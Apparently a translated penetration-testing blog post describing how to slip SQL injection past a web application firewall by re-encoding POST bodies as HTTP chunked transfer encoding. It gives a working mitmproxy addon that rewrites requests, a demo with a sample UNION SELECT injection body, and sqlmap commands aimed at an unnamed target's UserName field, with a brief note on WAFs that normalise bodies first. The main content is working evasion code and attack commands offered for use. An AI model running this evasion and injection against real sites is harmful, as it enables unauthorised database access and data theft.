This came up mainly on a certain xxx. Testing it directly, I found the request got blocked, and by luck I came across bypassing the WAF with HTTP chunked transfer encoding, which also pointed at a Burp extension, chunked-coding-converter. But if I want to run it with sqlmap that doesn't seem very convenient! (Actually that was wrong; it seems it can be set globally. More on that later.)
So I thought of using a proxy to alter the data on the way out. And sure enough, I found someone had already made something similar: sqlmap_chunked_proxy. It was just that when I actually tested it, it seemed to keep throwing errors:
[+] chunked Succeeded
Traceback (most recent call last):
File "sqlmap_chunked_proxy.py", line 121, in <module>
aa = hack.httpraw(raw)
File "/usr/local/lib/python3.7/site-packages/HackRequests/HackRequests.py", line 220, in httpraw
conn.putheader(k, v)
File "/usr/local/Cellar/python/3.7.3/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 1197, in putheader
raise ValueError('Invalid header name %r' % (header,))
ValueError: Invalid header name b''
After tinkering with it for ages I still had no idea what the problem was, and during actual testing I also found the cookie was being lost. With that many problems I just decided to write my own.
For capturing, intercepting and rewriting packets, mitmproxy is still the first choice: write one addon and the request can be modified in place. This borrows the encoding scheme from sqlmap_chunked_proxy and was easy to implement:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
mitmdump -k -s chunked_proxy.py -p 9999

Turns every POST body that arrives with a Content-Length into a hand-built
Transfer-Encoding: chunked body made of many small chunks, so that a WAF
matching signatures on the raw request no longer sees the payload in one piece.
'''
import random
import string

import mitmproxy.http
from mitmproxy import ctx


def Confuse():
    # random 1-9 character chunk extension name (RFC 7230 chunk-ext); pure noise
    return ''.join(random.sample(string.ascii_letters + string.digits, random.randint(1, 9)))


def payloadlistnum(s):
    # pick a chunk count n so that the average chunk is shorter than 9 bytes
    # (len(s) / n < 9  <=>  n > len(s) / 9), without the original retry loop
    return random.randint(len(s) // 9 + 1, len(s))


def payloadlist(s, n):
    # split s into n pieces whose lengths differ by at most one byte
    fn, rn = divmod(len(s), n)
    sr = []
    ix = 0
    for i in range(n):
        size = fn + 1 if i < rn else fn
        sr.append(s[ix:ix + size])
        ix += size
    return sr


def payload2(s, n):
    # RFC 7230 chunk format: hex size, ';' plus a random extension, CRLF, data, CRLF.
    # The original wrote decimal sizes and bare '\n'; decimal and hex only coincide
    # for single-digit sizes, which is what the "< 9" limit above was relying on.
    payload2 = b''
    for i in payloadlist(s, n):
        if len(i) == 0:
            continue
        payload2 += b'%x;%s\r\n%s\r\n' % (len(i), Confuse().encode(), i)
    payload2 += b'0\r\n\r\n'   # zero-size chunk terminates the body
    return payload2


def tamper(s):
    if not s:
        return s   # nothing to chunk (randint(1, 0) would raise otherwise)
    n = payloadlistnum(s)
    return payload2(s, n)


class Counter:
    def request(self, flow: mitmproxy.http.HTTPFlow):
        # only rewrite POST requests that carry a normal Content-Length body
        if flow.request.method != "POST" or "Content-Length" not in flow.request.headers:
            return
        # work on the raw bytes so multi-byte characters cannot throw off chunk sizes
        flow.request.content = tamper(flow.request.content)
        # RFC 7230 3.3.3: a message must not carry both headers and Transfer-Encoding
        # wins, so drop the Content-Length mitmproxy just recomputed for the new body
        del flow.request.headers["Content-Length"]
        flow.request.headers["Transfer-Encoding"] = "chunked"
        # cookies and every other header are left untouched
        ctx.log.info("Request Data: %r" % flow.request.content)

    def response(self, flow: mitmproxy.http.HTTPFlow):
        ctx.log.info("Response Data: %s" % flow.response.text)


addons = [
    Counter()
]
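To see what this encoding actually does to a request, here is a stand-alone example added for this write-up (it is not part of the original post, of sqlmap_chunked_proxy or of mitmproxy): a chunked encoder in the same style, the decoder a conforming origin server applies, and two toy WAF checks, one that matches over the raw bytes and one that normalises the body first. The sample body, the two signatures and the function names are constructed for the demo and are not taken from any real WAF or from the post.

```python
import random
import re
import string
from typing import Optional

# Constructed sample body: an error-based injection attempt in the UserName field.
PAYLOAD = b"UserName=admin' UNION SELECT 1,2,3--&Password=x"

# Two toy signatures standing in for a WAF rule set (assumption: rules applied to the body bytes).
SIGNATURES = [re.compile(rb"union\s+select", re.I),
              re.compile(rb"'\s*or\s*1\s*=\s*1", re.I)]


def chunk_body(body: bytes, max_chunk: int = 4, rng: Optional[random.Random] = None) -> bytes:
    """Encode body as an RFC 7230 chunked message body.

    Every chunk is at most max_chunk bytes, so any signature longer than that is
    split across a size line. Sizes are hexadecimal, each chunk carries a random
    chunk extension (";name") as extra noise, lines end in CRLF and the body is
    terminated by a zero-size chunk.
    """
    rng = rng or random.Random()
    alphabet = string.ascii_letters + string.digits
    out = bytearray()
    for i in range(0, len(body), max_chunk):
        piece = body[i:i + max_chunk]
        ext = "".join(rng.choice(alphabet) for _ in range(rng.randint(1, 9)))
        out += b"%x;%s\r\n%s\r\n" % (len(piece), ext.encode(), piece)
    out += b"0\r\n\r\n"
    return bytes(out)


def dechunk(wire: bytes) -> bytes:
    """Reassemble a chunked body the way an origin server does (RFC 7230 4.1).

    Accepts upper- or lower-case hex sizes, ignores chunk extensions and skips
    trailer fields after the zero-size chunk. Raises ValueError on malformed input.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = wire.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing CRLF after chunk size")
        size = int(wire[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            # Zero-size chunk: optional trailer lines follow, then a blank line.
            while wire[pos:pos + 2] != b"\r\n":
                eol = wire.find(b"\r\n", pos)
                if eol < 0:
                    raise ValueError("unterminated trailer section")
                pos = eol + 2
            return bytes(out)
        out += wire[pos:pos + size]
        pos += size
        if wire[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def naive_waf_blocks(raw_body: bytes) -> bool:
    """A WAF that runs its signatures over the transport bytes without decoding Transfer-Encoding."""
    return any(sig.search(raw_body) for sig in SIGNATURES)


def decoding_waf_blocks(raw_body: bytes, chunked: bool) -> bool:
    """A WAF that normalises Transfer-Encoding first, i.e. inspects what the application will see."""
    return naive_waf_blocks(dechunk(raw_body) if chunked else raw_body)


def demo(seed: int = 1) -> dict:
    wire = chunk_body(PAYLOAD, max_chunk=4, rng=random.Random(seed))
    return {
        "plain_blocked": naive_waf_blocks(PAYLOAD),                # True: signature hits the plain body
        "chunked_blocked": naive_waf_blocks(wire),                 # False: split across chunks, no hit
        "decoding_waf_blocked": decoding_waf_blocks(wire, True),   # True: a normalising WAF still catches it
        "server_sees": dechunk(wire),                              # the original payload, byte for byte
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The last check is the caveat: the trick only defeats a WAF that matches before decoding Transfer-Encoding. One that normalises the body first sees exactly what the server sees, so a blocked request after chunking tells you the WAF is decoding, not that the encoding is wrong.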
Usage is simple too. First start the proxy:
mitmdump -k -s chunked_proxy.py -p 9999
Before starting the scan, check what actually leaves the proxy: send one request through it to a raw listener (for example nc -l 9998 standing in for the target) and confirm the body arrives as hex-sized chunks with CRLF line endings and no Content-Length header. mitmproxy's HTTP/1 writer can chunk-encode a body itself when it sees Transfer-Encoding: chunked, so make sure the hand-built chunks have not been wrapped in a second chunk layer; if they have, use the Burp route described below instead.
Then run sqlmap with its traffic routed through the proxy:
python sqlmap.py -r ~/Downloads/123 --level 3 --risk 1 --random-agent --proxy=http://127.0.0.1:9999 -p UserName --technique=E --dbms 'Microsoft SQL Server'
Alternatively, enable global chunked encoding in Burp (the chunked-coding-converter extension mentioned at the start) and run sqlmap through Burp's proxy instead:
python sqlmap.py -r ~/Downloads/123 --level 3 --risk 1 --random-agent --proxy=http://127.0.0.1:8080 -p UserName --technique=E --dbms 'Microsoft SQL Server'
Current sqlmap releases also have a built-in --chunked switch that sends POST bodies with HTTP chunked transfer encoding without any proxy in between; whichever route you pick, the same raw-listener check above tells you what the WAF really receives.